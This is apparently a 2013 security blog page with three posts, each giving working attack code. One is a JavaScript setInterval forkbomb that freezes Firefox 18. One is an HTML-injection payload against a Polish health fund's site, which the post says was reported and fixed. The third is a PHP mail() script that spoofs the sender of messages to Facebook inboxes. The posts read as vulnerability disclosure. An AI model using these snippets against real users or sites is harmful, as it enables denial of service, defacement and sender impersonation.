Wednesday, January 9, 2013

Firefox 18 with new IonMonkey JIT has landed, but...

Yesterday Mozilla released Firefox 18. The main improvement is new JIT compiler called IonMonkey (release note you can find here).

Sadly, Firefox 18 is still vulnerable to javascript simple forkbomb which results in denial of service:

function x() {
  for(var r=0; r<100000; r++) {
    var e=setInterval("x()", 1);
  }
}

var d=setInterval("x()", 1);

Live test "here".

PS 1. New Firefox contains also integrated PDF Viewer called PDF.js. Interesting fact is that it's written entirely in Javascript. Project is available on github.

PS 2. Firefox 10 was released on January 31, 2012, so it's 9th Firefox version since then. Software development philosophy responsible for such rapid releasing is called Release early, release often.

Friday, January 4, 2013

Wstrzykiwanie kodu html na stronę NFZ

Niewystarczająca filtracja (usuwanie tylko frazy script) w parametrze slowo w skrypcie new/tagi.php powoduje, że poprzez manipulację tego parametru możemy wstawić dowolny kod html.

Dla przykładu wstrzyknięcie takiego kodu html:
<span style="position:absolute;left:150px;top:45px;">
  <img src="http://bit.ly/Uoyc3d" width=50 />
</span>

Da wynik:


Przetestuj sam

Błąd został zgłoszony, a dobór obrazka w przykładzie jest zupełnie przypadkowy :)

Update 07-01-2013: Błąd został naprawiony.

Thursday, January 3, 2013

Facebook: sending messages to strangers (non friends) for free or/and spoofing sender

Facebook tests paid messages to strangers. How much would you pay to contact a stranger? Well, actually you can do it for free. In case if you don't know, when you have facebook account you already have email address in facebook domain. You can just simply send email to particular address, and message will appear in facebook inbox. However, depends on settings in "Who can contact me" receiver will be notified or not and message will be put in "Inbox" or "Other" mailbox. By default it is set to "Basic Filtering", which means that you will be notified ("paid option" just ignore those settings so receiver will be always notified and you have guarantee that your message will be put in "Inbox").

This is already well-known issue as a facebook message spoofing. Why? Because we can spoof mail header in a oldschool way :) For example this simple php script will do the job:
$to = 'facebookID@facebook.com';
$senderAddress = 'email@address.tld';
$subject = 'Some subject';
$message = 'Some message';

$header = "From: $senderAddress\nReply-To: $senderAddress";
$mail = mail($to, $subject, $message, $header);
This short video demonstrating above script in action:

PS. And yes, facebook is filtering and rejecting mails from facebook.com domain. If it didn't it would be devastating.